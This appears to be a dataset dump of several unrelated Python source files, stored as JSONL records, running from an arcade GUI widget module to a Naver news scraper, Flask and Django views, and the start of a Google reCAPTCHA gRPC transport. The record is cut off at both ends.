self.right_index += 1\n if len(self.text) > self.char_limit:\n self.left_index += 1\n else:\n self.text += chr(key)\n self.cursor_index += 1\n self.right_index += 1\n if len(self.text) >= self.char_limit:\n self.left_index += 1\n self.visible_text = self.text[self.left_index:self.right_index]\n if self.cursor_index > self.left_index:\n self.local_cursor_index = self.cursor_index - self.left_index\n else:\n self.local_cursor_index = self.left_index\n return self.visible_text, self.cursor_symbol, self.local_cursor_index\n\n\nclass TextBox:\n def __init__(self, x, y, width=300, height=40, theme=None, outline_color=arcade.color.BLACK, font_size=24,\n shadow_color=arcade.color.WHITE_SMOKE, highlight_color=arcade.color.WHITE):\n self.theme = theme\n if self.theme:\n self.text_display = 
TextDisplay(x, y, width, height, theme=self.theme)\n self.text_storage = TextStorage(width, theme=self.theme)\n else:\n self.text_display = TextDisplay(x, y, width, height, outline_color, shadow_color, highlight_color)\n self.text_storage = TextStorage(width, font_size)\n self.text = \"\"\n\n def draw(self):\n self.text_display.draw()\n\n def update(self, delta_time, key):\n if self.text_display.highlighted:\n self.text, symbol, cursor_index = self.text_storage.update(delta_time, key)\n self.text_display.update(delta_time, self.text, symbol, cursor_index)\n\n def check_mouse_press(self, x, y):\n self.text_display.check_mouse_press(x, y)\n\n def check_mouse_release(self, x, y):\n self.text_display.check_mouse_release(x, y)\n\n\nclass Font:\n \"\"\"\n Font settings for draw gui items.\n\n Attributes:\n :name: Font name.\n :size: Font size.\n :color: Font color.\n :bold: True - font is bold\n :italic: True - font is italic\n \"\"\"\n\n DEFAULT_NAME = ('calibri', 'arial')\n DEFAULT_SIZE = 24\n DEFAULT_COLOR = arcade.color.BLACK\n\n def __init__(self, name=None, size=None, color=None,\n bold=False, italic=False):\n \"\"\"\n Create a new font.\n\n :param string | tuple of string name: Font name, or list of font\n names in order of preference\n :param float size: Size of the font\n :param (int, int, int) color: Color of the font\n :param boolean bold: Bold font style\n :param boolean italic: Italic font style\n\n \"\"\"\n self.name = name if name is not None else self.__class__.DEFAULT_NAME\n self.size = size if size is not None else self.__class__.DEFAULT_SIZE\n self.color = color if color is not None else self.__class__.DEFAULT_COLOR\n self.bold = bold\n self.italic = italic\n\n\nclass Theme:\n\n def __init__(self):\n self.button_textures = {'normal': '', 'hover': '', 'clicked': '', 'locked': ''}\n self.menu_texture = \"\"\n self.window_texture = \"\"\n self.dialogue_box_texture = \"\"\n self.text_box_texture = \"\"\n self.__font = Font()\n\n font = property(\n lambda self: self.__font,\n None,\n None,\n \"Font of theme\"\n )\n\n def add_button_textures(self, normal, hover=None, clicked=None, locked=None):\n normal_texture = arcade.load_texture(normal)\n self.button_textures['normal'] = normal_texture\n\n self.button_textures['hover'] = arcade.load_texture(hover) \\\n if hover is not None else normal_texture\n self.button_textures['clicked'] = arcade.load_texture(clicked) \\\n if clicked is not None else normal_texture\n self.button_textures['locked'] = arcade.load_texture(locked) \\\n if locked is not None else normal_texture\n\n def add_window_texture(self, window_texture):\n self.window_texture = arcade.load_texture(window_texture)\n\n def add_menu_texture(self, menu_texture):\n self.menu_texture = arcade.load_texture(menu_texture)\n\n def add_dialogue_box_texture(self, dialogue_box_texture):\n self.dialogue_box_texture = arcade.load_texture(dialogue_box_texture)\n\n def add_text_box_texture(self, text_box_texture):\n self.text_box_texture = arcade.load_texture(text_box_texture)\n\n def set_font(self, font_size, font_color, font_name=None):\n \"\"\" Deprecated. Set font. 
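Prefer assigning to the ``font`` attributes directly, e.g. ``theme.font.size = 18``. 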
\"\"\"\n\n import warnings\n warnings.warn(\"set_font has been deprecated, please use Theme.font attribute instead.\", DeprecationWarning)\n\n self.font.color = font_color\n self.font.size = font_size\n self.font.name = font_name \\\n if font_name is not None \\\n else Font.DEFAULT_NAME\n","sub_path":"arcade/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":17529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"263343289","text":"#####################################\n## Calc the inverse number for arr\n#####################################\ndef inverseNumber( arr ):\n return __calcInverseNumber( arr[:] , 0 , len(arr))\n\ndef __calcInverseNumber( arr , l , r ):\n\n if r - l <= 1:\n return 0\n \n res1 = __calcInverseNumber( arr , l , l + (r-l)//2 )\n res2 = __calcInverseNumber( arr , l + (r-l)//2 , r )\n res = __mergeSortAndCalcInverseNumber( arr , l , r ) + res1 + res2\n #print(\"[DEBUG] the inverse number of arr[\",l,\",\",r,\"] is\",res)\n return res\n\ndef __mergeSortAndCalcInverseNumber( arr , l , r ):\n\n sortedArr = []\n res = 0\n\n i = l\n j = l + (r-l)//2\n while i < l + (r-l)//2 and j < r:\n if arr[i] <= arr[j]:\n sortedArr.append( arr[i] )\n i += 1\n else:\n sortedArr.append( arr[j] )\n res += ( l + (r-l)//2 - i)\n j += 1\n\n while i < l + (r-l)//2:\n sortedArr.append( arr[i] )\n i += 1\n\n while j < r:\n sortedArr.append( arr[j] )\n #res += ( l + (r-l)//2 - i )\n j += 1\n\n arr[l:r] = sortedArr\n \n return res\n\nif __name__ == \"__main__\":\n N = int(input())\n arr = [int(input()) for i in range(N)]\n print( inverseNumber(arr) )\n","sub_path":"00Basic/1019.py","file_name":"1019.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"121824690","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"The setup script.\"\"\"\n\nfrom setuptools import setup, find_packages\nimport os, re, io\n\n####################################\n# Package meta-data.\n####################################\nname = 'python-tsl2591'\npackage = 'python_tsl2591'\ndescription = \"Community-coded Python module for TSL2591 sensor converted from Adafruit's TSL2591 library. 
Use at your own risk.\"\nurl = 'http://github.com/kyletaylored/python-tsl2591'\nemail = 'maxhofb@gmail.com'\nauthor = 'Max Hofbauer'\n\n# What packages are required for this module to be executed?\nrequirements = ['smbus2>=0.2', ]\n\nsetup_requirements = [ ]\n\ntest_requirements = [ ]\n\n# What packages are optional?\nextras = {\n    # 'fancy feature': ['django'],\n}\n####################################\n# End Metadata\n####################################\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\n
# Import the README and use it as the long-description.\n# Note: this will only work if 'README.md' is present in your MANIFEST.in file!\ntry:\n    with io.open(os.path.join(here, 'README.md'), encoding='utf-8') as f:\n        long_description = '\\n' + f.read()\nexcept FileNotFoundError:\n    long_description = description\n\n
# Load the package's __version__.py.\nverstr = \"Unknown\"\nVERSIONFILE = os.path.join(package, \"__version__.py\")\nverstrline = open(VERSIONFILE, \"rt\").read()\nVSRE = r\"^__version__ = ['\\\"]([^'\\\"]*)['\\\"]\"\nmo = re.search(VSRE, verstrline, re.M)\nif mo:\n    verstr = mo.group(1)\nelse:\n    raise RuntimeError(\"Unable to find version string in %s.\" % (VERSIONFILE,))\n\n
####################################\n# Setuptools\n####################################\nsetup(\n    author=author,\n    author_email=email,\n    classifiers=[\n        'Development Status :: 2 - Pre-Alpha',\n        'Intended Audience :: Developers',\n        'License :: OSI Approved :: MIT License',\n        'Natural Language :: English',\n        \"Programming Language :: Python :: 2\",\n        'Programming Language :: Python :: 2.7',\n        'Programming Language :: Python :: 3',\n        'Programming Language :: Python :: 3.4',\n        'Programming Language :: Python :: 3.5',\n        'Programming Language :: Python :: 3.6',\n        'Programming Language :: Python :: 3.7',\n        \"Operating System :: POSIX :: Linux\",\n    ],\n    description=description,\n    install_requires=requirements,\n    extras_require=extras,\n    license=\"MIT license\",\n    long_description=long_description,\n    long_description_content_type='text/markdown',\n    include_package_data=True,\n    keywords=['python_tsl2591', 'tsl2591', 'light sensor', 'adafruit'],\n    name=name,\n    packages=find_packages(include=['python_tsl2591']),\n    setup_requires=setup_requirements,\n    url=url,\n    version=verstr,\n    zip_safe=False,\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"345796720","text":"import numpy as np\nimport torch\nfrom ase import units\n\nfrom schnetpack.md.utils import MDUnits\n\n# __all__ = [\n#     \"load_gle_matrices\",\n#     \"GLEMatrixParser\",\n#     \"YSWeights\"\n# ]\n\n\n
def load_gle_matrices(filename):\n    \"\"\"\n    Load GLE thermostat files formatted in raw format as generated via http://gle4md.org/index.html?page=matrix\n    The generated matrices are numpy arrays of the shape normal_modes x s+1 x s+1, where normal_modes is 1 except in\n    the case of the PIGLET thermostat and s is the number of degrees of freedom added via GLE. Automatically recognizes\n    used units and converts them to atomic units.\n
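\n    Example (illustrative only; the file name is hypothetical):\n        >>> a_matrix, c_matrix = load_gle_matrices(\"gle_parameters.txt\")\n        >>> a_matrix.shape   # (normal_modes, s + 1, s + 1); normal_modes == 1 for plain GLE\n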
\n    Args:\n        filename (str): Path to the file the GLE thermostat parameters should be loaded from.\n\n    Returns:\n        tuple: Tuple of two square numpy arrays containing the a_matrix and c_matrix parameters required to\n               initialize GLE type thermostats.\n    \"\"\"\n    a_matrix = GLEMatrixParser(\n        \"A MATRIX:\", stop=\"C MATRIX:\", split=\"Matrix for normal mode\"\n    )\n    c_matrix = GLEMatrixParser(\"C MATRIX:\", split=\"Matrix for normal mode\")\n\n
    try:\n        with open(filename) as glefile:\n            for line in glefile:\n                a_matrix.read_line(line)\n                c_matrix.read_line(line)\n    except FileNotFoundError:\n        raise FileNotFoundError(\n            \"Could not open {:s} for reading. Please use GLE parameter files \"\n            \"generated via http://gle4md.org/index.html?page=matrix\".format(filename)\n        )\n\n    return a_matrix.matrix, c_matrix.matrix\n\n\n
class GLEMatrixParser:\n    \"\"\"\n    General parser for GLE thermostat files. Reads from start string until end of file or a given stop string. If the\n    argument split is specified, the read matrices are split at the given token. Automatically recognizes\n    used units and converts them to atomic units.\n\n    Args:\n        start (str): Token when to start reading.\n        stop (str): Token when to stop reading. If None (default), reads until end of file.\n        split (str): If the given token is encountered, matrices are split at this point. If None (default), no split is\n            performed.\n    \"\"\"\n\n
    # Automatically recognizes the unit format and converts to atomic units\n    unit_conversions = {\n        \"atomic time units^-1\": 1,\n        \"picoseconds^-1\": 1 / 1000 / MDUnits.fs2atu,\n        \"seconds^-1\": units._aut,\n        \"femtoseconds^-1\": 1 / MDUnits.fs2atu,\n        \"eV\": 1 / units.Ha,\n        \"atomic energy units\": 1,\n        \"K\": MDUnits.kB,\n    }\n\n
    def __init__(self, start, stop=None, split=None):\n        self.start = start\n        self.stop = stop\n        self.split = split\n        self.read = False\n        self.units = None\n        self._matrix = []\n        self._tmp_matrix = []\n\n
    def read_line(self, line):\n        \"\"\"\n        Read and parse a line obtained from an open file object containing GLE parameters.\n\n        Args:\n            line (str): Line of a GLE parameter file.\n        \"\"\"\n        line = line.strip()\n        # Filter for empty lines\n        if line:\n            # Check if start token is present\n            if self.start in line:\n                self.read = True\n                # Get units used\n                unit_name = line.split(\"(\")[-1].replace(\")\", \"\")\n                self.units = self.unit_conversions[unit_name]\n            elif self.read:\n                if line.startswith(\"#\"):\n                    # Check for stop and split tokens\n                    if self.stop is not None and self.stop in line:\n                        self.read = False\n                    if self.split is not None and self.split in line:\n                        if len(self._tmp_matrix) > 0:\n                            self._matrix.append(self._tmp_matrix)\n                            self._tmp_matrix = []\n                else:\n                    # Otherwise read and parse line\n                    self._tmp_matrix.append([float(x) for x in line.split()])\n\n
    @property\n    def matrix(self):\n        \"\"\"\n        Property to get parsed matrices converted to numpy arrays using atomic units.\n\n        Returns:\n            numpy.array: Array of the parsed GLE matrix with the shape normal_modes x s+1 x s+1, where normal_modes is 1\n                except in the case of the PIGLET thermostat and s is the number of degrees of freedom added via\n                GLE. If no matrix is found, None is returned.\n        \"\"\"\n
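        # Per the docstring above: a plain GLE thermostat yields shape (1, s + 1, s + 1),\n        # while PIGLET yields one (s + 1, s + 1) block per ring-polymer normal mode.\n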
        # Write out last buffer\n        if len(self._tmp_matrix) > 0:\n            self._matrix.append(self._tmp_matrix)\n        # Convert to numpy array\n        _matrix = np.array(self._matrix)\n        # Perform unit conversion\n        if self.units is not None:\n            return _matrix * self.units\n        else:\n            return None\n\n\n
class YSWeights:\n    \"\"\"\n    Weights for Yoshida-Suzuki integration used in propagating the Nose-Hoover chain thermostats.\n\n    Args:\n        device (str): Device used for computation (default='cuda').\n    \"\"\"\n\n
    YS_weights = {\n        3: np.array([1.35120719195966, -1.70241438391932, 1.35120719195966]),\n        5: np.array(\n            [\n                0.41449077179438,\n                0.41449077179438,\n                -0.65796308717750,\n                0.41449077179438,\n                0.41449077179438,\n            ]\n        ),\n        7: np.array(\n            [\n                -1.17767998417887,\n                0.23557321335936,\n                0.78451361047756,\n                1.31518632068390,\n                0.78451361047756,\n                0.23557321335936,\n                -1.17767998417887,\n            ]\n        ),\n    }\n\n
    def __init__(self, device):\n        self.device = device\n\n    def get_weights(self, order):\n        \"\"\"\n        Get the weights required for an integration scheme of the desired order.\n\n        Args:\n            order (int): Desired order of the integration scheme.\n\n        Returns:\n            torch.Tensor: Tensor of the integration weights\n        \"\"\"\n        if order not in self.YS_weights:\n            raise ValueError(\n                \"Order {:d} not supported for YS integration weights\".format(order)\n            )\n        else:\n            ys_weights = (\n                torch.from_numpy(self.YS_weights[order]).float().to(self.device)\n            )\n            return ys_weights\n","sub_path":"schnetpack/md/utils/thermostat_utils.py","file_name":"thermostat_utils.py","file_ext":"py","file_size_in_byte":6305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"210542425","text":"from flask import Blueprint, redirect, url_for, request, render_template, flash\nfrom app import db\nfrom app.models import MenuItem, Restaurant, User\n\n# Define the blueprint: 'auth', set its url prefix: mod_home.url/auth\nmod_menu_item = Blueprint('menu_item', __name__, url_prefix='/', template_folder='mod_menu_item',\n                          static_folder='mod_home')\n\n\n
@mod_menu_item.route('restaurant/<int:restaurant_id>/new/', methods=['GET', 'POST'])\ndef new_menu_item(restaurant_id):\n    \"\"\"\n    Add a new menu item to the restaurant\n    \"\"\"\n    if request.method == \"POST\":\n        restaurant = Restaurant.query.filter_by(id=restaurant_id).first()\n        menu_item = MenuItem(name=request.form['name'], course=request.form['course'],\n                             description=request.form['description'], price=request.form['price'],\n                             restaurant=restaurant)\n        db.session.add(menu_item)\n        db.session.commit()\n        return redirect(url_for('home.restaurants', restaurant_id=restaurant_id))\n    else:\n        return render_template('menu_item/new_menu_item.html', restaurant_id=restaurant_id)\n\n\n
@mod_menu_item.route('/restaurant/<int:restaurant_id>/<int:menu_id>/edit/', methods=['POST', 'GET'])\ndef edit_menu_item(restaurant_id, menu_id):\n    \"\"\"\n    Allows user to edit a menu item from a specific restaurant\n    \"\"\"\n    edited_item = None\n    if request.method == 'POST':\n        if request.form['name']:\n            edited_item = MenuItem.query.filter_by(id=menu_id).one()\n            edited_item.name = request.form[\"name\"]\n            db.session.add(edited_item)\n            db.session.commit()\n        return redirect(url_for('home.restaurantMenu', restaurant_id=restaurant_id))\n    else:\n        return render_template('menu_item/edit_menu_item.html', restaurant_id=restaurant_id,\n                               MenuID=menu_id,\n                               item=edited_item)\n\n\n
@mod_menu_item.route('restaurant/<int:restaurant_id>/<int:menu_id>/delete/')\ndef delete_menu_item(restaurant_id, menu_id):\n    \"\"\"\n    Allows user to delete a specific menu item from a specific 
restaurant\n \"\"\"\n return \"page to delete a menu item. Task 3 complete!\"\n","sub_path":"app/mod_menu_item/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"72327863","text":"def max_profit(prices):\n min_buy = float('inf')\n max_pro = 0\n\n for price in prices:\n min_buy = min(min_buy, price)\n max_pro = max(max_pro, price - min_buy)\n \n return max_pro\n\n\nif __name__ == '__main__':\n prices = [310, 315, 275, 295, 260, 270, 290, 230, 255, 250]\n print(max_profit(prices))","sub_path":"algos_recap/max_profit.py","file_name":"max_profit.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"499342442","text":"from preprocess.textfilter import textfilter\nfrom preprocess.QAgenerator import QAgenerator \nfrom preprocess.features_generator import features_generator\nfrom preprocess.tfidfgenerator import tfidfgenerator \n\ndef main():\n\tfile_route = \"/Users/ink/Documents/testbot.txt\"\n\ttext_filter = textfilter(file_route)\n\torig_data = text_filter.remove_url() # remove the url from the data\n\n\tqa_generator = QAgenerator(orig_data)\n\tqa_generator.processData()\n\n\tanswers = qa_generator.get_answers()\n\tquestions = qa_generator.get_questions()\n\n\tfeature_gen = features_generator()\n\tans_tokens = feature_gen.get_tokens(answers)\n\tques_tokens = feature_gen.get_tokens(questions)\n\n\tprint(ans_tokens)\n\tprint(ques_tokens)\n\n\tans_pinyin = feature_gen.get_pinyin(ans_tokens)\n\tques_pinyin = feature_gen.get_pinyin(ques_tokens)\n\n\tprint(ans_pinyin)\n\tprint(ques_pinyin)\n\n\ttfidf_gen = tfidfgenerator()\n\n\tans_tfidf, ans_shape = tfidf_gen.get_tfidf(answers)\n\tquest_tfidf, quest_shape = tfidf_gen.get_tfidf(questions)\n\tprint(ans_shape)\n\tprint(quest_shape)\n\nmain()\n\n\n\n\n","sub_path":"source/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"583609159","text":"from bs4 import BeautifulSoup\nfrom datetime import datetime\nimport requests\nimport urllib.request\nfrom urllib.parse import quote\nimport configparser\nimport pandas as pd\nimport re\n\n'''''''''''''''''''''''''''''''''''''''''''''''''''''''''\n< naver 뉴스 검색시 리스트 크롤링하는 프로그램 > _select사용\n- 크롤링 해오는 것 : 링크,제목,신문사,날짜,내용요약본\n- 날짜,내용요약본 -> 정제 작업 필요\n- 리스트 -> 딕셔너리 -> df -> 엑셀로 저장 \n'''''''''''''''''''''''''''''''''''''''''''''''''''''''''\n\nclass NaverNewsCrawler():\n #각 크롤링 결과 저장하기 위한 리스트 선언 \n # title_text=[]\n # link_text=[]\n # source_text=[]\n # date_text=[]\n # contents_text=[]\n # result={}\n\n #엑셀로 저장하기 위한 변수\n \n # now = datetime.now() #파일이름 현 시간으로 저장하기\n\n def __init__(self):\n config = configparser.RawConfigParser()\n config.read('conf/config.ini')\n self.title_text=[]\n self.link_text=[]\n self.press_text=[]\n self.info_text=[]\n self.date_text=[]\n self.contents_text=[]\n self.article_text=[]\n self.result={} \n self.RESULT_PATH ='D:/crawling_result/Naver_News/' #결과 저장할 경로\n self.now = datetime.now() #파일이름 현 시간으로 저장하기\n\n #날짜 정제화 함수\n def date_cleansing(self, test):\n try:\n #지난 뉴스\n #머니투데이 10면1단 2018.11.05. 네이버뉴스 보내기 \n pattern = '\\d+.(\\d+).(\\d+).' 
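#정규표현식: e.g. r.search(\"머니투데이 10면1단 2018.11.05. 네이버뉴스\").group(0) == \"2018.11.05.\"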
\n\n            r = re.compile(pattern)\n            match = r.search(test).group(0) # 2018.11.05.\n            self.date_text.append(match)\n        \n        except AttributeError:\n            #최근 뉴스\n            #이데일리 1시간 전 네이버뉴스 보내기 \n            pattern = '\\w* (\\d\\w*)' #정규표현식 \n            \n            r = re.compile(pattern)\n            match = r.search(test).group(1)\n            #print(match)\n            self.date_text.append(match)\n\n
    #내용 정제화 함수 \n    def contents_cleansing(self, contents):\n        first_cleansing_contents = re.sub('<dl>.*?</a> </div> </dd> <dd>', '', \n                                          str(contents)).strip()  #앞에 필요없는 부분 제거\n        second_cleansing_contents = re.sub('<ul class=\"relation_lst\">.*?</dd>', '', \n                                           first_cleansing_contents).strip()  #뒤에 필요없는 부분 제거 (새끼 기사)\n        third_cleansing_contents = re.sub('<.+?>', '', second_cleansing_contents).strip()\n        self.contents_text.append(third_cleansing_contents)\n        #print(self.contents_text)\n\n
    def get_article(self, url):\n        text = \"\"\n        if url is None:\n            return \"\"\n\n        try: \n            print(\"news url\", url)\n            news_link = urllib.request.urlopen(url).read() \n            soup = BeautifulSoup(news_link, 'html.parser') \n        except Exception:\n            return \"\"\n        \n
        # 연합뉴스\n        if ('://yna' in url) or ('app.yonhapnews' in url): \n            main_article = soup.find('div', {'class':'story-news article'})\n            if main_article is None:\n                main_article = soup.find('div', {'class' : 'article-txt'})\n            if main_article is None:\n                main_article = soup.find('article')\n\n            if main_article is not None: \n                text = main_article.text\n            else:\n                text = \"\"\n        \n
        # MBC \n        elif '//imnews.imbc' in url: \n            text = soup.find('div', {'itemprop' : 'articleBody'}).text\n        \n        # 매일경제(미라클), req.encoding = None 설정 필요\n        elif 'mirakle.mk' in url:\n            text = soup.find('div', {'class' : 'view_txt'}).text\n        \n        # 매일경제, req.encoding = None 설정 필요\n        elif 'mk.co' in url:\n            text = soup.find('div', {'class' : 'art_txt'}).text\n        \n
        # SBS\n        elif 'news.sbs' in url:\n            text = soup.find('div', {'itemprop' : 'articleBody'}).text\n        \n        # KBS\n        elif 'news.kbs' in url:\n            text = soup.find('div', {'id' : 'cont_newstext'}).text\n        \n        # JTBC\n        elif 'news.jtbc' in url:\n            text = soup.find('div', {'class' : 'article_content'}).text\n        \n        # 그 외\n        else:\n            text = \"\"\n        \n        return text.replace('\\n','').replace('\\r','').replace('\\xa0','').replace('
    ','').replace('\\t','') \n\n def crawler(self, maxpage,query,sort,s_date,e_date):\n url_query = quote(query)\n s_from = s_date.replace(\".\",\"\")\n e_to = e_date.replace(\".\",\"\")\n page = 1 \n maxpage_t =(int(maxpage)-1)*10+1 # 11= 2페이지 21=3페이지 31=4페이지 ...81=9페이지 , 91=10페이지, 101=11페이지\n \n while page <= maxpage_t:\n print(\"page\", page, maxpage_t)\n url = \"https://search.naver.com/search.naver?where=news&query=\" + url_query + \"&sort=\"+sort+\"&ds=\" + s_date + \"&de=\" + e_date + \"&nso=so%3Ar%2Cp%3Afrom\" + s_from + \"to\" + e_to + \"%2Ca%3A&start=\" + str(page)\n print(\"search url\", url)\n # response = requests.get(url)\n # html = response.text\n search_url = urllib.request.urlopen(url).read()\n\n #뷰티풀소프의 인자값 지정\n soup = BeautifulSoup(search_url, 'html.parser')\n\n table = soup.find('ul',{'class' : 'list_news'})\n li_list = table.find_all('li', {'id': re.compile('sp_nws.*')})\n area_list = [li.find('div', {'class' : 'news_area'}) for li in li_list]\n # title_list = [area.find('a', {'class' : 'news_tit'}) for area in area_list]\n # contents_list = [area.find('div', {'class' : 'news_dsc'}) for area in area_list]\n # press_list = [area.find('a', {'class' : 'info press'}) for area in area_list]\n # info_list = [area.find('a', {'class' : 'info'}) for area in area_list]\n\n for area in area_list:\n self.title_text.append(area.find('a', {'class' : 'news_tit'}).get('title')) #제목\n self.link_text.append(area.find('a', {'class' : 'news_tit'}).get('href')) #링크주소\n self.article_text.append(self.get_article(area.find('a', {'class' : 'news_tit'}).get('href'))) #신문 본문\n self.press_text.append(area.find('a', {'class' : 'info press'}).get_text()) #언론사\n self.info_text.append(area.find('a', {'class' : 'info'}).get_text()) #네이버신문 \n self.contents_text.append(area.find('div', {'class' : 'news_dsc'}).get_text()) #네이버신문 요약 \n\n # for title in title_list:\n # self.title_text.append(title.get('title')) #제목\n # self.link_text.append(title.get('href')) #링크주소\n # self.article_text.append(\"\")\n # # self.article_text.append(self.get_article(title.get('href')))\n\n\n # for press in press_list:\n # self.press_text.append(press.get_text()) #언론사\n\n # for info in info_list:\n # self.info_text.append(info.get_text()) #네이버신문\n\n # for contents in contents_list:\n # self.contents_text.append(contents.get_text()) #네이버신문 요약 \n\n # if(new_url == '#'):\n # continue\n # else:\n # news_link = urllib.request.urlopen(new_url).read()\n # news_html = BeautifulSoup(new_link, 'html.parser')\n # news_title = news_html.find('h3', {'id':'articleTitle'}).get_text()\n # news_datetime = news_html.find('span', {'class':'t11'}).get_text()\n # news_article = news_html.find('div', {'id':'articleBodyContents'}).get_text()\n\n # news_df.loc[idx] = [news_title, news_url, press, news_datetime, news_article]\n # idx += 1\n # print(\"#\", end=\"\")\n\n # #태그에서 제목과 링크주소 추출\n # atags = soup.select('._sp_each_title')\n # print(\"atags text\", atags)\n # for atag in atags:\n # self.title_text.append(atag.text) #제목\n # self.link_text.append(atag['href']) #링크주소\n \n # print(\"title text\", self.title_text)\n # #신문사 추출\n # source_lists = soup.select('._sp_each_source')\n # for source_list in source_lists:\n # source_text.append(source_list.text) #신문사\n \n # #날짜 추출 \n # date_lists = soup.select('.txt_inline')\n # for date_list in date_lists:\n # test=date_list.text \n # date_cleansing(test) #날짜 정제 함수사용 \n \n # #본문요약본\n # contents_lists = soup.select('ul.type01 dl')\n # for contents_list in contents_lists:\n # #print('==='*40)\n # 
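NOTE: the selectors in this commented-out block (ul.type01, ._sp_each_title, .txt_inline)\n            # target an older Naver search results layout; the active code above parses the current\n            # layout via ul.list_news / div.news_area instead.\n            # 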
#print(contents_list)\n # contents_cleansing(contents_list) #본문요약 정제화\n \n \n # 모든 리스트 딕셔너리형태로 저장\n self.result= {\"title\":self.title_text , \"link\":self.link_text, \"press\" : self.press_text, \"info\" : self.info_text, \"contents\" : self.contents_text, \"article\" : self.article_text } \n # self.result= {\"date\" : self.date_text , \"title\":self.title_text , \"source\" : self.source_text ,\"contents\": self.contents_text ,\"link\":self.link_text } \n # # result= {\"date\" : date_text , \"title\":title_text , \"source\" : source_text ,\"contents\": contents_text ,\"link\":link_text } \n # print(page)\n \n df = pd.DataFrame(self.result) #df로 변환\n page += 10\n \n \n # 새로 만들 파일이름 지정\n outputFileName = 'Naver News %s-%s-%s %s시 %s분 %s초 merging.xlsx' % (self.now.year, self.now.month, self.now.day, self.now.hour, self.now.minute, self.now.second)\n df.to_excel(self.RESULT_PATH+outputFileName,sheet_name='sheet1') \n\n\nif __name__ == \"__main__\":\n crawler = NaverNewsCrawler()\n crawler.crawler(1, \"인공지능\",\"1\",\"2021.01.04\",\"2021.04.30\")","sub_path":"StockAnalyzer/common/materialanalysis/news_crawler/search_news_crawler.py","file_name":"search_news_crawler.py","file_ext":"py","file_size_in_byte":10577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"179978349","text":"from django.views.generic import ListView, DetailView\nfrom django.shortcuts import render, HttpResponseRedirect, redirect, get_object_or_404\nfrom django.contrib.auth import logout as auth_logout\nfrom django.core.exceptions import ObjectDoesNotExist\n\nfrom django.contrib.auth.models import User\nfrom social.apps.django_app.default.models import UserSocialAuth\nfrom photo.models import Photo\nfrom userprofile.models import UserProfile\nfrom workspaces.forms import UserSettingsForm, UserProfileForm\n\n\ndef home_page(request):\n context = ''\n return render(request, 'base.html', context)\n\n\nclass UserList(ListView):\n model = User\n context_object_name = 'users'\n template_name = 'user_list.html'\n\n def get_context_data(self, **kwargs):\n context = super(UserList, self).get_context_data(**kwargs)\n context['user_profiles'] = UserProfile.objects.all()\n return context\n\n\ndef user_detail(request, username):\n user = get_object_or_404(User, username=username)\n try:\n user_profile = UserProfile.objects.get(user_id=user)\n except ObjectDoesNotExist:\n user_profile = {}\n try:\n user_social_auth = UserSocialAuth.objects.filter(user=user)\n except ObjectDoesNotExist:\n user_social_auth = {}\n photos = Photo.objects.filter(created_by=user)\n context = {'user': user, 'user_social_auth': user_social_auth, 'photos': photos, 'user_profile': user_profile}\n return render(request, 'user_detail.html', context)\n\n\ndef user_settings(request):\n user = get_object_or_404(User, username=request.user.username)\n try:\n user_profile = UserProfile.objects.get(user_id=user)\n except ObjectDoesNotExist:\n user_profile = UserProfile.objects.create(user_id=user.id)\n form_user_settings = UserSettingsForm(request.POST or None, instance=user)\n form_user_profile = UserProfileForm(request.POST or None, request.FILES or None, instance=user_profile)\n\n if request.method == 'POST':\n if form_user_settings.is_valid() and form_user_profile.is_valid():\n form_user_settings.save()\n form_user_profile.save()\n return redirect('/settings')\n return render(request, 'user_settings.html', {'form_user_settings': form_user_settings,\n 'form_user_profile': form_user_profile})\n\ndef logout(request):\n 
\"\"\"Logs out user\"\"\"\n auth_logout(request)\n return HttpResponseRedirect('/')\n","sub_path":"workspaces/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"113167889","text":"# -*- coding: utf-8 -*-\n\n# Copyright 2020 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nfrom typing import Callable, Dict, Tuple\n\nfrom google.api_core import grpc_helpers # type: ignore\nfrom google.auth import credentials # type: ignore\nfrom google.auth.transport.grpc import SslCredentials # type: ignore\n\n\nimport grpc # type: ignore\n\nfrom google.cloud.recaptchaenterprise_v1.types import recaptchaenterprise\nfrom google.protobuf import empty_pb2 as empty # type: ignore\n\nfrom .base import RecaptchaEnterpriseServiceTransport\n\n\nclass RecaptchaEnterpriseServiceGrpcTransport(RecaptchaEnterpriseServiceTransport):\n \"\"\"gRPC backend transport for RecaptchaEnterpriseService.\n\n Service to determine the likelihood an event is legitimate.\n\n This class defines the same methods as the primary client, so the\n primary client can load the underlying transport implementation\n and call it.\n\n It sends protocol buffers over the wire using gRPC (which is built on\n top of HTTP/2); the ``grpcio`` package must be installed.\n \"\"\"\n\n def __init__(\n self,\n *,\n host: str = \"recaptchaenterprise.googleapis.com\",\n credentials: credentials.Credentials = None,\n channel: grpc.Channel = None,\n api_mtls_endpoint: str = None,\n client_cert_source: 